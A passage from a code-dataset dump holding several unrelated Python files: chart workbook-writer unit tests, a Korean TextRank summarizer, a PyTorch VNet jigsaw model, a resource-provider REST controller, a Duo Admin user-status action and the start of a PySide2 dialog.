'EAST']]],\n [(1, 1, 'CA'), (2, 1, 'NV'), (3, 1, 'NY'), (4, 1, 'NJ'),\n (1, 0, 'WEST'), (3, 0, 'EAST')],\n [('s1', (1, 2, 3, 4)), ('s2', (5, 6, 7, 8))],\n [((0, 2, 's1'), (1, 2, (1, 2, 3, 4), ANY)),\n ((0, 3, 's2'), (1, 3, (5, 6, 7, 8), ANY))]),\n ])\n def populate_fixture(\n self, request, chart_data_, workbook_, worksheet_, categories_):\n levels, cat_call_args, ser_data, ser_call_args = request.param\n\n workbook_writer = CategoryWorkbookWriter(chart_data_)\n\n sers = []\n for idx, (name, values) in enumerate(ser_data):\n ser = instance_mock(\n request, CategorySeriesData, index=idx, values=values\n )\n ser.name = name\n sers.append(ser)\n\n expected_calls = [call.write(*args) for args in cat_call_args]\n for name_args, col_args in ser_call_args:\n expected_calls.extend([\n call.write(*name_args), call.write_column(*col_args)\n ])\n\n chart_data_.categories = categories_\n categories_.depth = len(levels)\n categories_.levels = levels\n chart_data_.__iter__.return_value = iter(sers)\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n @pytest.fixture(params=[\n (1, 0, 'Sheet1!$B$1'),\n (1, 3, 'Sheet1!$E$1'),\n (3, 0, 'Sheet1!$D$1'),\n (3, 3, 'Sheet1!$G$1'),\n ])\n def ser_name_ref_fixture(self, request, series_data_, categories_):\n cat_depth, series_index, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(None)\n series_data_.categories = categories_\n categories_.depth = cat_depth\n series_data_.index = series_index\n return workbook_writer, series_data_, expected_value\n\n @pytest.fixture(params=[\n (1, 0, 3, 'Sheet1!$B$2:$B$4'),\n (1, 1, 3, 'Sheet1!$C$2:$C$4'),\n (2, 0, 5, 'Sheet1!$C$2:$C$6'),\n (3, 2, 7, 'Sheet1!$F$2:$F$8'),\n ])\n def values_ref_fixture(self, request, series_data_, categories_):\n cat_depth, ser_idx, val_count, expected_value = request.param\n workbook_writer = CategoryWorkbookWriter(None)\n series_data_.categories = categories_\n categories_.depth = cat_depth\n series_data_.index = ser_idx\n series_data_.__len__.return_value = val_count\n return workbook_writer, series_data_, expected_value\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def categories_(self, request):\n return instance_mock(request, Categories)\n\n @pytest.fixture\n def chart_data_(self, request):\n return instance_mock(request, CategoryChartData)\n\n @pytest.fixture\n def series_data_(self, request):\n return instance_mock(request, CategorySeriesData)\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n\nclass DescribeBubbleWorkbookWriter(object):\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def populate_fixture(self, workbook_, worksheet_):\n chart_data = BubbleChartData()\n series_1 = chart_data.add_series('Series 1')\n for pt in ((1, 1.1, 10), (2, 2.2, 20)):\n series_1.add_data_point(*pt)\n series_2 = chart_data.add_series('Series 2')\n for pt in ((3, 3.3, 30), (4, 4.4, 40)):\n series_2.add_data_point(*pt)\n\n workbook_writer = BubbleWorkbookWriter(chart_data)\n\n expected_calls = [\n call.write_column(1, 0, [1, 2], ANY),\n call.write(0, 1, 'Series 1'),\n call.write_column(1, 1, [1.1, 2.2], ANY),\n call.write(0, 2, 'Size'),\n call.write_column(1, 2, [10, 20], ANY),\n\n call.write_column(5, 0, [3, 4], ANY),\n call.write(4, 1, 'Series 2'),\n call.write_column(5, 1, [3.3, 4.4], ANY),\n call.write(4, 2, 'Size'),\n call.write_column(5, 2, [30, 40], ANY),\n ]\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n\nclass DescribeXyWorkbookWriter(object):\n\n def it_can_generate_a_chart_data_Excel_blob(self, xlsx_blob_fixture):\n workbook_writer, _open_worksheet_, xlsx_file_ = xlsx_blob_fixture[:3]\n _populate_worksheet_, workbook_, worksheet_ = xlsx_blob_fixture[3:6]\n xlsx_blob_ = xlsx_blob_fixture[6]\n\n xlsx_blob = workbook_writer.xlsx_blob\n\n _open_worksheet_.assert_called_once_with(xlsx_file_)\n _populate_worksheet_.assert_called_once_with(workbook_, worksheet_)\n assert xlsx_blob is xlsx_blob_\n\n def it_can_populate_a_worksheet_with_chart_data(self, populate_fixture):\n workbook_writer, workbook_, worksheet_, expected_calls = (\n populate_fixture\n )\n workbook_writer._populate_worksheet(workbook_, worksheet_)\n assert worksheet_.mock_calls == expected_calls\n\n # fixtures -------------------------------------------------------\n\n @pytest.fixture\n def populate_fixture(self, workbook_, worksheet_):\n chart_data = XyChartData()\n series_1 = chart_data.add_series('Series 1')\n for pt in ((1, 1.1), (2, 2.2)):\n series_1.add_data_point(*pt)\n series_2 = chart_data.add_series('Series 2')\n for pt in ((3, 3.3), (4, 4.4)):\n series_2.add_data_point(*pt)\n\n workbook_writer = XyWorkbookWriter(chart_data)\n\n expected_calls = [\n call.write_column(1, 0, [1, 2], ANY),\n call.write(0, 1, 'Series 1'),\n call.write_column(1, 1, [1.1, 2.2], ANY),\n\n call.write_column(5, 0, [3, 4], ANY),\n call.write(4, 1, 'Series 2'),\n call.write_column(5, 1, [3.3, 4.4], ANY)\n ]\n return workbook_writer, workbook_, worksheet_, expected_calls\n\n @pytest.fixture\n def xlsx_blob_fixture(\n self, request, xlsx_file_, BytesIO_, _open_worksheet_, workbook_,\n worksheet_, _populate_worksheet_, xlsx_blob_):\n workbook_writer = XyWorkbookWriter(None)\n return (\n workbook_writer, _open_worksheet_, xlsx_file_,\n _populate_worksheet_, workbook_, worksheet_, xlsx_blob_\n )\n\n # fixture components ---------------------------------------------\n\n @pytest.fixture\n def BytesIO_(self, request, xlsx_file_):\n return class_mock(\n request, 'pptx.chart.xlsx.BytesIO', return_value=xlsx_file_\n )\n\n @pytest.fixture\n def _open_worksheet_(self, request, workbook_, worksheet_):\n open_worksheet_ = method_mock(\n request, XyWorkbookWriter, '_open_worksheet'\n )\n # to make context manager behavior work\n open_worksheet_.return_value.__enter__.return_value = (\n workbook_, worksheet_\n )\n return open_worksheet_\n\n @pytest.fixture\n def _populate_worksheet_(self, request):\n return method_mock(request, XyWorkbookWriter, '_populate_worksheet')\n\n @pytest.fixture\n def workbook_(self, request):\n return instance_mock(request, Workbook)\n\n @pytest.fixture\n def worksheet_(self, request):\n return instance_mock(request, Worksheet)\n\n @pytest.fixture\n def xlsx_blob_(self, request):\n return instance_mock(request, bytes)\n\n @pytest.fixture\n def xlsx_file_(self, request, xlsx_blob_):\n xlsx_file_ = instance_mock(request, BytesIO)\n xlsx_file_.getvalue.return_value = xlsx_blob_\n return xlsx_file_\n","sub_path":"tests/chart/test_xlsx.py","file_name":"test_xlsx.py","file_ext":"py","file_size_in_byte":14549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641386587","text":"# -*- coding: utf-8 -*-\nfrom konlpy.tag import Mecab\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom crawler import news_document_class as nd\nimport numpy as np\nimport re\n\n'''\n주어진 문���를 n줄로 요약하는 메소드인 get_n_summary와 문서에서 tfidf[count] vector[matrix]를 구하는 메소드 선언\n'''\n\n\nclass text_rank:\n def __init__(self, text):\n self.text = nd.prettify_sentences(text)\n self.sentences_n = len(text.split(\".\"))\n self.summary_n = None\n\n def select_summary_n(self):\n self.summary_n = 10\n n_class = [(3, range(0, 11)),\n (3, range(11, 21)),\n (4, range(21, 31)),\n (5, range(31, 41)),\n (6, range(41, 51)),\n (7, range(51, 101))]\n for x in n_class:\n if self.sentences_n in x[1]:\n # print(x[1])\n self.summary_n = x[0]\n break\n\n def doc_to_stemmed_words(self) :\n '''\n 뉴스기사의 각 문장에서 추출한 단어의 어근들을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: 각 문장에서 추출한 단어의 어근들의 리스트를 원소로 갖는 리스트 (nested list)\n '''\n\n sentences = (self.text).split(\".\")\n\n #kkma = Kkma()\n #remove_pos = \"[(?P<조사>JK.*)(?P<접속조사>JC.*)(?P<전성어미>ET.*)(?P<종결어미>EF.*)(?P<연결어미>EC.*)(?P<접미사>XS.*)(?P<마침표물음표느낌표>SF.*)(?P<쉼표가운뎃점콜론빗금>SP.*)]\" #kkma\n mecab = Mecab()\n remove_pos = \"[(?P<조사>JK.*)(?P<접속조사>JC.*)(?P<전성어미>ET.*)(?P<종결어미>EF.*)(?P<연결어미>EC.*)(?P<접미사>XS.*)(?P<마침표물음표느낌표>SF.*)(?P<쉼표가운뎃점콜론빗금>SC.*)]\" # mecab\n\n stemmed_sentences = []\n\n for sentence in sentences :\n # stemmed_words = kkma.pos(sentence)\n stemmed_words = mecab.pos(sentence)\n stemmed_words = [x[0] for x in stemmed_words if not bool(re.match(remove_pos, x[1]))]\n stemmed_sentences.append(stemmed_words)\n\n return stemmed_sentences\n\n def get_tfidf_vector(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 tfidf 값을 원소로 갖는 벡터를 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: tfidf를 구한 어근을 원소로 갖는 리스트 (list), tfidf 값을 원소로 갖는 리스트 (list)\n '''\n\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n tfidf = TfidfVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n stemmed_article = [\" \".join(stemmed_article)]\n tfidf_vec = np.ndarray.tolist(np.squeeze(tfidf.fit_transform(stemmed_article).toarray()))\n feature_name = tfidf.get_feature_names()\n\n return feature_name, tfidf_vec\n\n def get_tfidf_matrix(self) :\n '''\n 어근 추출된 뉴스 기사의 각 문장의 단어 리스트와 그 단어들의 tfidf 값을 원소로 갖는 행렬을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: tfidf를 구한 어근을 원소로 갖는 리스트 (list), tfidf 값을 원소로 갖는 이중 리스트 (nested list)\n '''\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n tfidf = TfidfVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n tfidf_mat = tfidf.fit_transform(stemmed_article).toarray()\n feature_name = tfidf.get_feature_names()\n\n return feature_name, tfidf_mat\n\n def get_count_vector(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 count값을 원소로 갖는 벡터를 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: count를 구한 어근을 원소로 갖는 리스트 (list), count값을 원소로 갖는 리스트 (list)\n '''\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n cnt_vec = CountVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n stemmed_article = [\" \".join(stemmed_article)]\n count_vec = np.ndarray.tolist(np.squeeze(cnt_vec.fit_transform(stemmed_article).toarray()))\n feature_name = cnt_vec.get_feature_names()\n\n return feature_name, count_vec\n\n def get_count_matrix(self) :\n '''\n 어근 추출된 뉴스 기사의 단어 벡터와 그 단어들의 count 값을 원소로 갖는 행렬을 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :return: count를 구한 어근을 원소로 갖는 리스트 (list), count 값을 원소로 갖는 이중 리스트 (nested list)\n '''\n stemmed_sentences = self.doc_to_stemmed_words()\n remove_pattern = re.compile('[^ ㄱ-ㅣ가-힣0-9a-zA-Z]+') # 한글,숫자,영어 제외한 문자\n\n cnt_vec = CountVectorizer()\n\n stemmed_article = []\n for stemmed_words in stemmed_sentences :\n sentence = \" \".join(stemmed_words) # stemmed된 단어를 사용할 예정\n sentence = remove_pattern.sub(\"\", sentence) # 한글, 숫자 제외한 문자는 제거 #본래 문장을 보여줄 땐 필요하지만 vector map 작성엔 불필요\n stemmed_article.append(sentence)\n\n count_vec = np.ndarray.tolist(np.squeeze(cnt_vec.fit_transform(stemmed_article).toarray()))\n feature_name = cnt_vec.get_feature_names()\n\n return feature_name, count_vec\n\n def get_textrank_from_text(self) :\n '''\n 문장들의 tfidf 행렬을 이용해 각 문장들 간의 text rank graph를 구하고, 각 문장의 text rank 값을 계산한다.\n 각 문장 번호와 textrank 값을 사전 형태로 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :param n: 요약하고자 하는 줄 수 (integer)\n :return: 문장의 index, text rank를 각각 key/value로 갖는 사전 (dictionary)\n '''\n _, tfidf_mat = self.get_tfidf_matrix()\n tfidf_mat = np.asarray(tfidf_mat)\n\n d = 0.85 # d = damping factor\n tfidf_graph = np.dot(tfidf_mat, tfidf_mat.T)\n matrix_size = tfidf_graph.shape[0]\n\n for id in range(matrix_size):\n tfidf_graph[id, id] = 0 # diagonal 부분을 0으로\n link_sum = np.sum(tfidf_graph[:, id]) # A[:, id] = A[:][id]\n if link_sum != 0:\n tfidf_graph[:, id] /= link_sum\n tfidf_graph[:, id] *= -d\n tfidf_graph[id, id] = 1\n\n B = (1-d) * np.ones((matrix_size, 1))\n ranks = np.linalg.solve(tfidf_graph, B) # 연립방정식 Ax = b\n textrank_dictionary = {idx: r[0] for idx, r in enumerate(ranks)}\n\n return textrank_dictionary\n\n def get_summary(self):\n '''\n 반환된 index를 바탕으로 전체 뉴스 기사 중 가장 중요도 높은 문장을 순서대로 n개 저장한 리스트를 반환한다.\n :param text: 뉴스기사 텍스트 (string)\n :param n: 요약하고자 하는 줄 수 (integer) \n :return: top n개의 문장을 원소로 갖는 리스트 (list)\n '''\n self.select_summary_n()\n n = self.summary_n\n article = [x+\".\" for x in (self.text).split(\".\")]\n textrank_dictionary = self.get_textrank_from_text()\n sorted_textrank = sorted(textrank_dictionary, key=lambda k: textrank_dictionary[k], reverse=True)[0:n]\n sorted_textrank.sort()\n\n summary = []\n for idx in sorted_textrank:\n summary.append(article[idx])\n\n join_summary = \" \".join(summary)\n\n return join_summary\n","sub_path":"crawler/text_rank.py","file_name":"text_rank.py","file_ext":"py","file_size_in_byte":9130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"432527980","text":"\n\ndef getInputNumber(min, max, prompt):\n\tinput_correct = False\n\twhile (input_correct == False):\n\t\ttry:\n\t\t\tnumber = int(input (prompt))\n\t\texcept ValueError:\n\t\t\tprint (\"This is not a number.\")\n\t\t\tcontinue\n\t\tif ((min <= number) and (number <= max)):\n\t\t\treturn number\n\t\telse:\n\t\t\tprint (\"Number out of range.\")\n","sub_path":"src/helpers/getInputNumber.py","file_name":"getInputNumber.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649751530","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport numpy as np \n\nfrom .utils import Normalize, JigsawHead\nfrom .hungarian import Hungarian\n\ndef passthrough(x, **kwargs):\n return x\n\ndef ELUCons(elu, nchan):\n if elu:\n return nn.ELU(inplace=True)\n else:\n return nn.PReLU(nchan)\n\n# normalization between sub-volumes is necessary\n# for good performance\nclass ContBatchNorm3d(nn.modules.batchnorm._BatchNorm):\n def _check_input_dim(self, input):\n if input.dim() != 5:\n raise ValueError('expected 5D input (got {}D input)'\n .format(input.dim()))\n # super(ContBatchNorm3d, self)._check_input_dim(input)\n\n def forward(self, input):\n self._check_input_dim(input)\n return F.batch_norm(\n input, self.running_mean, self.running_var, self.weight, self.bias,\n True, self.momentum, self.eps)\n\n\nclass LUConv(nn.Module):\n def __init__(self, nchan, elu):\n super(LUConv, self).__init__()\n self.relu1 = ELUCons(elu, nchan)\n self.conv1 = nn.Conv3d(nchan, nchan, kernel_size=5, padding=2)\n self.bn1 = ContBatchNorm3d(nchan)\n\n def forward(self, x):\n out = self.relu1(self.bn1(self.conv1(x)))\n return out\n\n\ndef _make_nConv(nchan, depth, elu):\n layers = []\n for _ in range(depth):\n layers.append(LUConv(nchan, elu))\n return nn.Sequential(*layers)\n\n\nclass InputTransition(nn.Module):\n def __init__(self, inChans, elu, outChans=16):\n super().__init__()\n self.conv = torch.nn.Sequential(\n torch.nn.Conv3d(inChans, outChans, 3, padding=1),\n ContBatchNorm3d(outChans),\n ELUCons(elu, outChans),\n\n torch.nn.Conv3d(outChans, outChans, 3, padding=1),\n ContBatchNorm3d(outChans),\n ELUCons(elu, outChans),\n )\n\n def forward(self, x):\n x = self.conv(x)\n\n return x\n\n\nclass DownTransition(nn.Module):\n def __init__(self, inChans, nConvs, elu, dropout=False):\n super(DownTransition, self).__init__()\n outChans = 2 * inChans\n self.down_conv = nn.Conv3d(inChans, outChans, kernel_size=2, stride=2)\n self.bn1 = ContBatchNorm3d(outChans)\n self.do1 = passthrough\n self.relu1 = ELUCons(elu, outChans)\n self.relu2 = ELUCons(elu, outChans)\n if dropout:\n self.do1 = nn.Dropout3d()\n self.ops = _make_nConv(outChans, nConvs, elu)\n\n def forward(self, x):\n down = self.relu1(self.bn1(self.down_conv(x)))\n out = self.do1(down)\n out = self.ops(out)\n out = self.relu2(torch.add(out, down))\n return out\n\n\nclass UpTransition(nn.Module):\n def __init__(self, inChans, outChans, nConvs, elu, dropout=False):\n super(UpTransition, self).__init__()\n self.up_conv = nn.ConvTranspose3d(inChans, outChans // 2, kernel_size=2, stride=2)\n self.bn1 = ContBatchNorm3d(outChans // 2)\n self.do1 = passthrough\n # self.do2 = nn.Dropout3d()\n self.do2 = passthrough\n self.relu1 = ELUCons(elu, outChans // 2)\n self.relu2 = ELUCons(elu, outChans)\n if dropout:\n self.do1 = nn.Dropout3d()\n self.ops = _make_nConv(outChans, nConvs, elu)\n\n def forward(self, x, skipx):\n out = self.do1(x)\n skipxdo = self.do2(skipx)\n out = self.relu1(self.bn1(self.up_conv(out)))\n xcat = torch.cat((out, skipxdo), 1)\n out = self.ops(xcat)\n out = self.relu2(torch.add(out, xcat))\n return out\n\n\nclass OutputTransition(nn.Module):\n def __init__(self, inChans, elu, n_classes):\n super(OutputTransition, self).__init__()\n self.conv1 = nn.Conv3d(inChans, inChans // 2, kernel_size=3, padding=1)\n self.bn1 = ContBatchNorm3d(inChans // 2)\n self.conv2 = nn.Conv3d(inChans // 2, n_classes, kernel_size=1)\n self.relu1 = ELUCons(elu, inChans // 2)\n\n def forward(self, x):\n # convolve 32 down to n_classes channels\n out = self.relu1(self.bn1(self.conv1(x)))\n out = self.conv2(out)\n return out\n\n\n\nclass VNet(nn.Module):\n # the number of convolutions in each layer corresponds\n # to what is in the actual prototxt, not the intent\n def __init__(self, n_channels, n_classes, input_size = 64, elu=False, pretrain = False, feat_dim=128, jigsaw = False):\n super(VNet, self).__init__()\n self.in_tr = InputTransition(n_channels, elu)\n self.down_tr32 = DownTransition(16, 1, elu)\n self.down_tr64 = DownTransition(32, 2, elu)\n self.down_tr128 = DownTransition(64, 3, elu)\n self.down_tr256 = DownTransition(128, 2, elu)\n self.up_tr256 = UpTransition(256, 256, 2, elu)\n self.up_tr128 = UpTransition(256, 128, 2, elu)\n self.up_tr64 = UpTransition(128, 64, 1, elu)\n self.up_tr32 = UpTransition(64, 32, 1, elu)\n self.out_tr = OutputTransition(32, elu, n_classes)\n self.pretrain = pretrain\n \n self.unary_fc = nn.Sequential(\n nn.AvgPool1d(4,4),\n nn.Flatten(), \n nn.Linear(16384 * 2, 4096),\n nn.Linear(4096, 64),\n )\n\n self.binary_fc = nn.Sequential(\n nn.Linear(16384 * 2, 512),\n nn.Linear(512, 7)\n )\n\n self.head = nn.Sequential(\n nn.Linear(16384, 1024),\n nn.Linear(1024, 128),\n Normalize(2)\n )\n\n def forward(self, x, u_label, b_label):\n tower_size = x.shape[0]\n x = x.transpose(0, 1)\n out16 = self.in_tr(x)\n out32 = self.down_tr32(out16)\n out64 = self.down_tr64(out32)\n out128 = self.down_tr128(out64)\n out256 = self.down_tr256(out128)\n\n unary_list = []\n perm_list = []\n cur_perm = u_label.squeeze(-1)\n\n ## first iter\n \n #out = self.up_tr256(out256, out128)\n #out = self.up_tr128(out, out64)\n #out = self.up_tr64(out, out32)\n #out = self.up_tr32(out, out16)\n #out = self.out_tr(out)\n\n features = torch.reshape(out256, \\\n (tower_size, 1, \\\n 8 * 16384))\n u_out = self.unary_fc(features)\n u_out = u_out.view(tower_size, 8, 8)\n u_out = F.log_softmax(u_out, 2)\n unary_list.append(u_out)\n perm_list.append(cur_perm)\n \n for iter_id in range(5 - 1):\n ### hungarian algorithm for new permutation\n out_detach = u_out.detach().cpu().numpy()\n feature_stack_detach = out256.detach().cpu().numpy()\n hungarian = Hungarian()\n\n new_feature_stack = np.zeros_like(feature_stack_detach)\n results_stack = np.zeros((tower_size, 8))\n\n for i in range(tower_size):\n hungarian.calculate(-1 * out_detach[i,:,:])\n results = hungarian.get_results()\n\n for j in range(8):\n new_feature_stack[i, results[j][1], :] = \\\n feature_stack_detach[i, results[j][0], :]\n results_stack[i, results[j][1]] = results[j][0]\n\n results_stack = torch.from_numpy(results_stack).long().cuda()\n cur_perm = torch.gather(cur_perm, 1, results_stack)\n perm_list.append(cur_perm)\n\n ### new iteration\n feature_stack = torch.from_numpy(new_feature_stack).float().cuda()\n features = torch.reshape(feature_stack, \\\n (tower_size, 1, \\\n 8 * 16384))\n\n u_out = self.unary_fc(features)\n u_out = u_out.view(tower_size, 8, 8)\n u_out = F.log_softmax(u_out, 2)\n unary_list.append(u_out)\n\n \n # binary loss\n binary_list = []\n for i in range(8):\n for j in range(i + 1, 8):\n feature_pair = torch.cat([out256[i].view(1, -1), \\\n out256[j].view(1, -1)], dim=1)\n b_out = self.binary_fc(feature_pair)\n b_out = F.log_softmax(b_out, 1)\n binary_list.append(b_out)\n\n binary_stack = torch.stack(binary_list, dim=1)\n binary_stack = binary_stack.view(-1, 7)\n \n return None, self.head(out256.view(8, -1)), unary_list, perm_list, binary_stack","sub_path":"uda/models/vnet_parallel_jigsaw.py","file_name":"vnet_parallel_jigsaw.py","file_ext":"py","file_size_in_byte":8363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"234166467","text":"# Copyright (c) 2016 Mellanox Technologies, Ltd\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pecan\nfrom pecan import abort\nfrom pecan import expose\nfrom pecan import rest\nimport six\nfrom six.moves import http_client\nfrom wsme import types as wtypes\nfrom wsmeext.pecan import wsexpose\n\nfrom nacsa.api.controllers.v1 import base\nfrom nacsa.api.controllers.v1 import capabilities\nfrom nacsa.api.controllers.v1 import inventories\nfrom nacsa.api.controllers.v1 import types\nfrom nacsa.api.controllers.v1 import weights\nfrom nacsa.db import exception as db_exc\nfrom nacsa import objects\n\n\nclass ResourceProvider(base.APIBase):\n \"\"\"API representation of a resource provider.\n\n This class enforces type checking and value constraints, and converts\n between the internal object model and the API representation of\n a resource provider.\n \"\"\"\n\n id = int\n uuid = types.uuid\n parent_uuid = types.uuid\n name = wtypes.text\n path = wtypes.text\n\n def __init__(self, **kwargs):\n self.fields = []\n for field in objects.ResourceProvider.fields:\n # Skip fields we do not expose.\n if not hasattr(self, field):\n continue\n self.fields.append(field)\n setattr(self, field, kwargs.get(field, wtypes.Unset))\n\n @classmethod\n def from_result(cls, result):\n \"\"\"Convert a NacsaObjectDB object to a ResourceProvider object.\n :param result: a :class:`nacsa.objects.base.NacsaObjectDB ` object.\n :returns: a :class:`nacsa.api.controllers.v1.resource_provider.\n ResourceProvider` object.\n \"\"\"\n instance = cls()\n exposed_fields = set(objects.ResourceProvider.fields)\n exposed_fields -= set(['generation'])\n for field in exposed_fields:\n setattr(instance, field, getattr(result, field))\n return instance\n\n\nclass ResourceProviderController(rest.RestController):\n \"\"\"REST controller for resource provider.\"\"\"\n\n @wsexpose([ResourceProvider])\n def get_all(self):\n \"\"\"Retrieve all resource providers.\n \"\"\"\n return map(ResourceProvider.from_result,\n objects.ResourceProvider.query())\n\n @wsexpose(ResourceProvider, types.uuid)\n def get_one(self, uuid):\n \"\"\"Retrieve information about the given resource provider.\n :param uuid: UUID of a resource provider.\n \"\"\"\n res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n return ResourceProvider.from_result(res_resource_provider)\n\n @wsexpose(ResourceProvider, body=ResourceProvider,\n status_code=http_client.CREATED)\n def post(self, resource_provider):\n \"\"\"Create a new resource_provider.\n :param resource_provider: a resource_provider within the request body.\n \"\"\"\n new_resource_provider = objects.ResourceProvider(pecan.request.context,\n **resource_provider.as_dict())\n new_resource_provider.create()\n return ResourceProvider.from_result(new_resource_provider)\n\n @wsexpose(ResourceProvider, types.uuid, body=types.jsontype)\n def patch(self, uuid, patch_fields):\n \"\"\"Update an existing resource provider.\n :param uuid: UUID of a resource provider.\n :param patch_fields: a json PATCH values to apply\n to this resource provider.\n \"\"\"\n res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n\n # set only exposed fields\n for field, value in six.iteritems(patch_fields):\n if field in objects.ResourceProvider.fields:\n setattr(res_resource_provider, field, value)\n\n res_resource_provider.save()\n return ResourceProvider.from_result(res_resource_provider)\n\n @wsexpose(None, types.uuid, status_code=http_client.NO_CONTENT)\n def delete(self, uuid):\n \"\"\"Delete a resource provider.\n :param uuid: UUID of a resource provider.\n \"\"\"\n weights = objects.Weight.get_by_uuid(uuid)\n for weight in weights:\n weight.destroy()\n res_resource_provider = objects.ResourceProvider.get_by_uuid(uuid)\n res_resource_provider.destroy()\n\n @expose()\n def _lookup(self, uuid, next_controller, *remainder):\n try:\n rp_db = objects.ResourceProvider.get_by_uuid(uuid)\n except db_exc.ResourceProviderNotFound:\n abort(http_client.NOT_FOUND,\n detail=''.join(('Resource provider with uuid ',\n uuid,\n ' could not be found')))\n\n if next_controller == 'inventories':\n return inventories.InventoryController(rp_db), remainder\n elif next_controller == 'capabilities':\n return capabilities.CapabilityController(rp_db), remainder\n elif next_controller == 'weights':\n return weights.WeightControllerFromRp(rp_db), remainder\n abort(http_client.NOT_FOUND)\n","sub_path":"nacsa/api/controllers/v1/resource_providers.py","file_name":"resource_providers.py","file_ext":"py","file_size_in_byte":5568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"219358520","text":"import komand\nfrom komand.exceptions import PluginException\nfrom .schema import GetUserStatusInput, GetUserStatusOutput, Input, Output, Component\n# Custom imports below\n\n\nclass GetUserStatus(komand.Action):\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name='get_user_status',\n description=Component.DESCRIPTION,\n input=GetUserStatusInput(),\n output=GetUserStatusOutput())\n\n def run(self, params={}):\n username = params.get(Input.USER)\n users = (self.connection.admin_api.get_users())\n\n if not users:\n raise PluginException(preset=PluginException.Preset.NOT_FOUND, data=\"Error: No users exist!\")\n\n for user in users:\n if user[\"username\"] != username:\n continue\n\n return {Output.STATUS: user[\"status\"], Output.USER_ID: user[\"user_id\"]}\n else:\n raise PluginException(preset=PluginException.Preset.NOT_FOUND, data=\"Error: No users exist!\")\n","sub_path":"duo_admin/komand_duo_admin/actions/get_user_status/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"485193365","text":"import logging\nfrom datetime import datetime\n\nfrom PySide2.QtCore import Qt, Signal, Property, Slot, QEvent\nfrom PySide2.QtSql import QSqlRelationalDelegate\nfrom PySide2.QtWidgets import QDialog, QMessageBox\nfrom PySide2.QtWidgets import QStyledItemDelegate\n\nfrom jal.ui.ui_reference_data_dlg import Ui_ReferenceDataDialog\nimport jal.ui_custom.reference_selector as ui # Full import due to \"cyclic\" reference\nfrom jal.ui_custom.helpers import g_tr, UseSqlTable, ConfigureTableView, rel_idx\nfrom jal.db.helpers import readSQL\n\n\n# --------------------------------------------------------------------------------------------------------------\n# Class to display and edit table with reference data (accounts, categories, 